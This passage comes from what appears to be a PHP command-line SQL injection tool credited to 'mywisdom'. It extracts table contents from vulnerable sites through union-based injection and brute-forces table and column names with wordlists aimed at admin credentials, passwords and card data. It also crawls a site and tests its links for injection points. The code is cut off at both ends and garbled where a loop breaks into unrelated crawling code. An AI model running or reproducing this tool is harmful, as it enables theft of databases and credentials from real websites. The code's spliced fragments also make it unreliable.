    global $a,$otomatis,$ix,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable;
    global $string,$i,$hex; // $string here shadows the parameter of the same name
    $hex='';
    for ($ix=0; $ix < strlen($string); $ix++) {
        $hex .= dechex(ord($string[$ix])); // no padding: e.g. a tab becomes "9", not "09"
    }
    return $hex;
}

/**
 * Menu option 8: prompt for the marker URL, a table name and an optional
 * column name, then dump that table. Only the global list starts on this
 * line; it and the body continue on the next line.
 */
function opsi_8() {
    global $string,$hex;
    global $ch2,$urlx2,$page2;
    global $fp,$errno,$errstr,$message,$res;
    global $stropdumkol1,$stropdumkol2,$stropdumkol3,$stropdumkol4,$colom,$denzuko,$capede,$by,$wisdom,$coding_by_mywisdom,$mywisdom,$open_vms,$concatdump,$strdump,$strdump2,$aksidump,$otomatis,$tabel,$ix,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2,
$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; echo "\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //"\nType target url c0de from previous scan:\n".$urlc0de; echo "\nType table name to dump:\n"; $tabel = trim(fgets(STDIN)); //"\nType table name to dump:\n".$tabel; echo "(please type column name to dump, if you want to dump all columns just press enter)"; echo "\nType column name to dump:\n"; $colom = trim(fgets(STDIN)); $url=$urlc0de; $by="mywisdom"; cekhttp(); $urlc0de=$url; $oldurlc0de=$urlc0de; $url_bejat=$urlc0de; $evasion="--"; $c0de="c0de"; $namatabel2=$tabel; $hasilcek=strstr($urlc0de,$c0de); if(!$hasilcek) { echo "\n[-]Sorry please enter url with c0de from previous scan !\n"; //"\n[-]Sorry please enter url with c0de from previous scan !\n"; } else { infomysql(); echo "\nColumn(s) inside $namatabel2\n"; //"\nColumn(s) inside $namatabel2\n"; $aksidump="no"; kolomschema($namatabel2,$oldurlc0de); echo "\n****************************************************\n"; $a="\n****************************************************\n"; tulisfile($a); if(empty($colom)) { $aksidump="yes"; kolomschema($namatabel2,$oldurlc0de); $coding_by_mywisdom="+from+$tabel--"; $mywisdom=str_replace($evasion,$coding_by_mywisdom,$url_bejat); $wisdom=str_replace($c0de,$open_vms,$mywisdom); echo "[+]URL injection: $wisdom"; $a="[+]URL injection: $wisdom"; echo "\n****************************************************\n"; $a.="\n****************************************************\n"; echo "\n[+]Data dumps from table:\n"; $a.="\n[+]Data dumps from table:\n"; $urlx=$wisdom; asal(); basic_curl($urlx); $capede = explode("mywisdom", $page); $denzuko=$capede[1]; pembersih(); if(!empty($denzuko)) { echo $denzuko."\n"; $a.=$denzuko."\n"; } else { echo "\nSorry data 
empty !!! no data found or columns too long !!!\n"; //"\nSorry data empty !!! no data found !!!\n"; } } else { //basis kolom //eof basis kolom } } tulisfile($a); } function opsi_9() { global $string,$hex; global $ch2,$urlx2,$page2; global $fp,$errno,$errstr,$message,$res; global $araykol,$hit,$targa,$ediman_lukito,$todlah,$object_oriented,$bhk,$defuse,$ujitabel,$ujikolom,$trialtable,$trialkolom,$daftar_tabel,$daftar_kolom,$alexander,$michael_angelo,$otomatis,$fuzz_tables,$fuzz_columns,$tabel,$ix,$stok_kolor,$url_bejat,$kolor,$zzz,$araykolom,$strkoleva,$concatkolom,$oldurlc0de,$hextable,$tablehash,$namatabel2,$namatabel,$concatable,$endschema2,$no,$jum,$kontenaray,$panjangstring,$ukuranaray,$i,$evasion,$endschema,$urlschema,$stringschema,$mysql_port_open,$namadb,$namauser,$namaversi,$araydb,$arayuser,$arayversi,$jepetandbx,$jepetanversix,$jepetanuserx,$urldb,$urluser,$urlversi,$jepetandb,$jepetanuser,$jepetanversi,$jepetandb1,$jepetandb2,$jepetanuser1,$jepetanuser2,$jepetanversi1,$jepetanversi2, $c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; 
$fuzz_tables="tbladmins|sort|_wfspro_admin|4images_users|a_admin|account|accounts|adm|admin|admin_login|admin_user|admin_userinfo|administer|administrable|administrate|administration|administrator|administrators|adminrights|admins|adminuser|art|article_admin|articles|artikel|\xc3\x83\xc3\x9c\xc3\x82\xc3\xab|aut|author|autore|backend|backend_users|backenduser|bbs|book|chat_config|chat_messages|chat_users|client|clients|clubconfig|company|config|contact|contacts|content|control|cpg_config|cpg132_users|customer|customers|customers_basket|dbadmins|dealer|dealers|diary|download|Dragon_users|e107.e107_user|e107_user|forum.ibf_members|fusion_user_groups|fusion_users|group|groups|ibf_admin_sessions|ibf_conf_settings|ibf_members|ibf_members_converge|ibf_sessions|icq|images|index|info|ipb.ibf_members|ipb_sessions|joomla_users|jos_blastchatc_users|jos_comprofiler_members|jos_contact_details|jos_joomblog_users|jos_messages_cfg|jos_moschat_users|jos_users|knews_lostpass|korisnici|kpro_adminlogs|kpro_user|links|login|logi 
n_admin|login_admins|login_user|login_users|logins|logon|logs|lost_pass|lost_passwords|lostpass|lostpasswords|m_admin|main|mambo_session|mambo_users|manage|manager|mb_users|member|memberlist|members|minibbtable_users|mitglieder|movie|movies|mybb_users|mysql|mysql.user|name|names|news|news_lostpass|newsletter|nuke_authors|nuke_bbconfig|nuke_config|nuke_popsettings|nuke_users|\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7|obb_profiles|order|orders|parol|partner|partners|passes|password|passwords|perdorues|perdoruesit|phorum_session|phorum_user|phorum_users|phpads_clients|phpads_config|phpbb_users|phpBB2.forum_users|phpBB2.phpbb_users|phpmyadmin.pma_table_info|pma_table_info|poll_user|punbb_users|pwd|pwds|reg_user|reg_users|registered|reguser|regusers|session|sessions|settings|shop.cards|shop.orders|site_login|site_logins|sitelogin|sitelogins|sites|smallnuke_members|smf_members|SS_orders|statistics|superuser|sysadmin|sysadmins|system|sysuser|sysusers|table|tables|tb_admin|tb_administrator|tb_login|tb_member|tb_members|tb_use r|tb_username|tb_usernames|tb_users|tbl|tbl_user|tbl_users|tbluser|tbl_clients|tbl_client|tblclients|tblclient|test|usebb_members|user|user_admin|user_info|user_list|user_login|user_logins|user_names|usercontrol|userinfo|userlist|userlogins|username|usernames|userrights|users|vb_user|vbulletin_session|vbulletin_user|voodoo_members|webadmin|webadmins|webmaster|webmasters|webuser|webusers|x_admin|xar_roles|xoops_bannerclient|xoops_users|yabb_settings|yabbse_settings|ACT_INFO|ActiveDataFeed|Category|CategoryGroup|ChicksPass|ClickTrack|Country|CountryCodes1|CustomNav|DataFeedPerformance1|DataFeedPerformance2|DataFeedPerformance2_incoming|DataFeedShowtag1|DataFeedShowtag2|DataFeedShowtag2_incoming|dtproperties|Event|Event_backup|Event_Category|EventRedirect|Events_new|Genre|JamPass|MyTicketek|MyTicketekArchive|News|Passwords by usage 
count|PerfPassword|PerfPasswordAllSelected|Promotion|ProxyDataFeedPerformance|ProxyDataFeedShowtag|ProxyPriceInfo|Region|SearchOptions|Series|Sheldonshows|StateList|States|SubCategory|Subjects|Survey|SurveyAnswer|SurveyAnswerOpen|SurveyQuestion|SurveyRespondent|sysconstraints|syssegments|tblRestrictedPasswords|tblRestrictedShows|Ticket System Acc Numbers|TimeDiff|Titles|ToPacmail1|ToPacmail2|Total Members|UserPreferences|uvw_Category|uvw_Pref|uvw_Preferences|Venue|venues|VenuesNew|X_3945|stone list|tblArtistCategory|tblArtists|tblConfigs|tblLayouts|tblLogBookAuthor|tblLogBookEntry|tblLogBookImages|tblLogBookImport|tblLogBookUser|tblMails|tblNewCategory|tblNews|tblOrders|tblStoneCategory|tblStones|tblUser|tblWishList|VIEW1|viewLogBookEntry|viewStoneArtist|vwListAllAvailable|CC_info|CC_username|cms_user|cms_users|cms_admin|cms_admins|user_name|jos_user|table_user|email|mail|bulletin|cc_info|login_name|admuserinfo|userlistuser_list|SiteLogin|Site_Login|UserAdmin|Admins|Login|Logins|administrasi|administrador|adm|yonetici"; 
$fuzz_columns="user|username|password|passwd|pass|cc_number|id|email|emri|fjalekalimi|pwd|user_name|customers_email_address|customers_password|user_password|name|user_pass|admin_user|admin_password|admin_pass|usern|user_n|users|login|logins|login_user|login_admin|login_username|user_username|user_login|auid|apwd|adminid|admin_id|adminuser|adminuserid|admin_userid|adminusername|admin_username|adminname|admin_name|usr|usr_n|usrname|usr_name|usrpass|usr_pass|usrnam|nc|uid|userid|user_id|myusername|mail|emni|logohu|punonjes|kpro_user|wp_users|emniplote|perdoruesi|perdorimi|punetoret|logini|llogaria|fjalekalimin|kodi|emer|ime|korisnik|korisnici|user1|administrator|administrator_name|mem_login|login_password|login_pass|login_passwd|login_pwd|sifra|lozinka|psw|pass1word|pass_word|passw|pass_w|user_passwd|userpass|userpassword|userpwd|user_pwd|useradmin|user_admin|mypassword|passwrd|admin_pwd|admin_passwd|mem_password|memlogin|e_mail|usrn|u_name|uname|mempassword|mem_pass|mem_passwd|mem_pwd|p_word|pword|p_assword|my 
name|my_username|my_name|my_password|my_email|cvvnumber|about|access|accnt|accnts|account|accounts|admin|adminemail|adminlogin|adminmail|admins|aid|aim|auth|authenticate|authentication|blog|cc_expires|cc_owner|cc_type|cfg|cid|clientname|clientpassword|clientusername|conf|config|contact|converge_pass_hash|converge_pass_salt|crack|customer|customers|cvvnumber]|data|db_database_name|db_hostname|db_password|db_username|download|e-mail|emailaddress|full|gid|group|group_name|hash|hashsalt|homepage|icq|icq_number|id_group|id_member|images|index|ip_address|last_ip|last_login|lastname|log|login_name|login_pw|loginkey|loginout|logo|md5hash|member|member_id|member_login_key|member_name|memberid|membername|members|new|news|nick|number|nummer|pass_hash|passwordsalt|passwort|personal_key|phone|privacy|pw|pwrd|salt|search|secretanswer|secretquestion|serial|session_member_id|session_member_login_key|sesskey|setting|sid|spacer|status|store|store1|store2|store3|store4|table_prefix|temp_pass|temp_password|temppass|temppasword| text|un|user_email|user_icq|user_ip|user_level|user_passw|user_pw|user_pword|user_pwrd|user_un|user_uname|user_usernm|user_usernun|user_usrnm|userip|userlogin|usernm|userpw|usr2|usrnm|usrs|warez|xar_name|xar_pass|lozinka|heslo|adgangskode|wachtwoord|contrasena|adm|administrador|yonetici"; $ujitabel="0x6861636b6564206279206d79776973646f6d"; $ujikolom="0x6e67656e746f74"; $bhk=base64_decode("aGFja2VkIGJ5IG15d2lzZG9t"); $todlah=base64_decode("bmdlbnRvdA=="); echo "\nType target url c0de from previous scan:\n"; //"\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //$urlc0de; $url=$urlc0de; cekhttp(); $urlc0de=$url; $oldurlc0de=$urlc0de; $url_bejat=$urlc0de; $defuse=$urlc0de; asal(); $evasion="--"; $c0de="c0de"; $daftar_tabel = explode("|",$fuzz_tables); $daftar_kolom = explode("|",$fuzz_columns); echo "\n[+]Please wait !!! trying to search table(s) inside this current database !!!\n"; //"\n[+]Please wait !!! 
trying to search table(s) inside this current database !!!\n"; foreach ($daftar_tabel as $trialtable) { asal(); $michael_angelo="+from+$trialtable--"; $alexander=str_replace($evasion,$michael_angelo,$defuse); $alexander=str_replace($c0de,$ujitabel,$alexander); $urlx=$alexander; basic_curl($urlx); if(strstr($page,$bhk)) { echo "\n[+] Found table name:$trialtable\n"; echo "\n--------------------------------\n"; echo "\n[+]Please wait! trying to search column(s) name inside table:$trialtable\n"; echo "\n--------------------------------\n"; $a=NULL; $a="\n[+] Found table name:$trialtable\n"; $a.="\n--------------------------------\n"; $a.="\n[+]Please wait! trying to search column(s) name inside table:$trialtable\n"; $a.= "\n--------------------------------\n"; tulisfile($a); $hit=0; while ($hit"," ",$gr); $gr=str_replace("src="," ",$gr); $gr=str_replace("codebase="," ",$gr); $gr=str_replace("<"," ",$gr); $gr=str_replace('"',"",$gr); $gr=trim($gr); //alur cek ? if(strstr($gr,"?") and strstr($gr,"=")) { if(strstr($gr,"http://")) { $gr=str_replace("href=","",$gr); if(strstr($gr,' ')) { $posisi=strpos($gr, ' ', 1); $posisi--; $gr=substr($gr,0,$posisi); } cek_order_by_100($url); cek_kutip($url); } else { if(strstr($gr,"href=")) { $gr=str_replace("href=","",$gr); if(strstr($gr,' ')) { $posisi=strpos($gr, ' ', 1); $posisi--; $gr=substr($gr,0,$posisi); $url=$gr; cek_order_by_100($url); cek_kutip($url); cek_blind($url); } $gr=$web.$gr; $url=$gr; cek_order_by_100($url); cek_kutip($url); cek_blind($url); } } } //eof alur ? 
//end
}
echo "\n------------------------------------------------\n";
echo "\nFound vulnerable link(s) at:\n";
$a= "\n------------------------------------------------\n";
$a.= "\nFound vulnerable link(s) at:\n";
tulisfile($a);
$simpan2=explode("|",$simpan);
if(sizeof($simpan2)>10) {
    echo $simpan2[0]."\n";
    echo $simpan2[1]."\n";
    echo $simpan2[2]."\n";
    echo $simpan2[3]."\n";
    echo $simpan2[4]."\n";
} else {
    foreach($simpan2 as $result) {
        echo $result."\n";
    }
}
}

/**
 * Clears the terminal before the menu is drawn.
 *
 * Reads two globals that are set elsewhere in the script: $bisajalan names
 * the process-execution function to use (passthru, system, exec or
 * shell_exec; presumably probed at startup — not visible from here) and
 * $bisa selects the command: 'cls' when it is empty, 'clear' otherwise.
 * The command string is a fixed literal and never built from input.
 * An unrecognised $bisajalan falls back to passthru(), and the name is
 * compared loosely (==) so the dispatch matches the earlier switch/case.
 *
 * NOTE(review): exec() and shell_exec() return the command output instead
 * of writing it to the terminal, so those two branches most likely leave
 * the screen unchanged; only passthru() and system() print what the
 * command emits.
 */
function starter() {
    global $bisa, $bisajalan;
    $perintah = empty($bisa) ? 'cls' : 'clear';
    // First loose match wins, exactly like the case labels of a switch;
    // no match at all means the passthru() default.
    $pilihan = 'passthru';
    foreach (array('passthru', 'system', 'exec', 'shell_exec') as $nama) {
        if ($bisajalan == $nama) {
            $pilihan = $nama;
            break;
        }
    }
    $pilihan($perintah);
}

utama();
?>